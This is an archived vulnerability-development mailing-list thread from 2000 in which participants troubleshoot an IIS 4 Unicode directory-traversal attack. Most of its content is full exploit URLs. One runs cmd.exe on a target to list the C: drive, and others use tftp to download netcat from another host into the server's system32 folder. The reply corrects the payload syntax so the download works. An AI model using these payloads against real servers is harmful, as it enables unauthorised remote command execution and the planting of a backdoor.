Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: dos commands via iis 4 (TFTP)

From: "Loschiavo, Dave" <DLoschiavo () FRCC CC CA US>
Date: Fri, 10 Nov 2000 11:16:25 -0800
Thanks, looks like I inadvertantly left the "get" out of the message. I was
including that in the URL when testing. However, what I did notice was the
use of the quotes in the "-i" area of the URL. I was not using quotes. Will
have to give that a shot.

-thanks

-----Original Message-----
From: Robert A. Seace
To: DLoschiavo () frcc cc ca us
Cc: VULN-DEV () SECURITYFOCUS COM
Sent: 11/10/00 10:11 AM
Subject: Re: dos commands via iis 4 (TFTP)

In the profound words of Loschiavo, Dave:


I tried tftp commands in the URL, formatted like this:


http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system
32/c

md.exe?/tftp+-i+192.168.1.20+nc.exe"

and got nowhere, while this:


http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system
32/c

md.exe?/c+dir+c: gave me a listing of the of the c: drive.

Am I formatting the "TFTP" URL incorrectly?


        Yeah, I think so...  But, I'm no TFTP guru, either...
Personally, I would just use RCP...

        However, looking at the original advisory on BugTraq, that
mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048";),
I think you need a "GET" before the "nc.exe", and maybe a destination
location specified after it, for where to place it on the NT box...
For instance, it shows an URL of:

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+n
cx99.exe+c:\winnt\system32\ncx99.exe
Previous By Date Next
Previous By Thread Next

Current thread: